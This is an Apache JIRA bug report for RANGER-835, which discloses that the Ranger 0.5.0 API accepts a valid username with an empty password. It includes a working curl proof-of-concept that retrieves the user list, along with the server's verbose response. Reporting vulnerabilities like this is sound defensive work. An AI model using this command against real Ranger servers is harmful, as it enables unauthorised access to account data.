Jim Halfpenny created RANGER-835:
------------------------------------
Summary: Authentication bypass in Ranger API
Key: RANGER-835
URL: https://issues.apache.org/jira/browse/RANGER-835
Project: Ranger
Issue Type: Bug
Components: Ranger
Affects Versions: 0.5.0
Reporter: Jim Halfpenny
Priority: Critical
Authentication to the Ranger API can be trivially bypassed by sending a valid
username along with a null password. API authentication appears to work
correctly, rejecting requests if the password is incorrect but allows requests
where no password has been sent.
The example below uses curl to demonstrate this issue by retrieving a list of
the users.
$ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users
* Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
* Server auth using Basic with user 'admin'
> HEAD /service/xusers/users HTTP/1.1
> Host: 127.0.0.1:6080
> Authorization: Basic YWRtaW46
> User-Agent: curl/7.43.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
< Content-Type: application/xml
< Content-Length: 0
< Date: Fri, 05 Feb 2016 11:41:16 GMT
<
<?xml version="1.0" encoding="UTF-8"
standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
